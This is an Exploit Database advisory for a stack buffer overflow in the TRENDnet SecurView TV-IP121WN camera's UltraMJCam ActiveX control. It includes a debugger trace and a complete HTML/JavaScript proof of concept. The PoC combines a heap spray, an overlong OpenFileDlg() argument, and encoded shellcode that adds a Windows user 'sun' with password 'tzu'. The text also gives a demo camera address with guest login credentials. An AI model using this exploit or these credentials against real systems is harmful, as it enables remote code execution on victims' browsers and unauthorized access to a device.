TRENDnet SecurView TV-IP121WN Wireless Internet Camera – UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

• Exploit Database
• 115 阅读

• 作者： rgod
  日期： 2012-03-28
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18675/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150

  TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow   camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0 username=guest password=guest     Background: The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings:   File version: 1, 1, 52, 18 Product name: UltraMJCam device ActiveX Control Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx ProgID: UltraMJCam.UltraMJCam.1 CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} Implements IObjectSafety: yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True     Vulnerability: This ActiveX control exposed the vulnerable OpenFileDlg() method, see typelib:   ... /* DISPID=101 */ /* VT_BSTR [8] */ function OpenFileDlg( /* VT_BSTR [8] [in] */ $sFilter ) { /* method OpenFileDlg */ } ...   By invoking this method with an overlong argument is possible to overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:     Call stack of main thread AddressStackProcedure / arguments Called from Frame 001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C 00127A10 0299F958 kernel32.WideCharToMultiByteUltraMJC.0299F952 00127A0C 00127A14 00000003 CodePage = 3 00127A18 00000000 Options = 0 00127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.) 00127A24 00127A50 MultiByteStr = 00127A50 00127A28 00007532 MultiByteCount = 7532 (30002.) 00127A2C 00000000 pDefaultChar = NULL 00127A30 00000000 pDefaultCharUsed = NULL 00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38     ... 0299F934 8B45 08mov eax,dword ptr ss:[ebp+8] 0299F937 C600 00mov byte ptr ds:[eax],0 0299F93A 6A 00push 0 0299F93C 6A 00push 0 0299F93E 8B4D 10mov ecx,dword ptr ss:[ebp+10] 0299F941 51 push ecx 0299F942 8B55 08mov edx,dword ptr ss:[ebp+8] 0299F945 52 push edx 0299F946 6A FFpush -1 0299F948 8B45 0Cmov eax,dword ptr ss:[ebp+C] 0299F94B 50 push eax 0299F94C 6A 00push 0 0299F94E 8B4D 14mov ecx,dword ptr ss:[ebp+14] 0299F951 51 push ecx 0299F952 FF15 20319F02call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------ ...   The result is that critical structures are overwritten (SEH) allowing to execute arbitrary code against the target browser. As attachment, basic proof of concept code.       <!-- TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc IE7-nodep   camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0 username=guest password=guest   rgod --> <!-- saved from url=(0014)about:internet --> <html> <object classid=&apos;clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11&apos; id=&apos;obj&apos; /> </object> <script language=&apos;javascript&apos;> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1888;i++){memory[i] = block+shellcode} </script> <script defer=defer> var x =""; for (i=0; i<15000; i++){ x = x + "&"; } obj.OpenFileDlg(x); </script>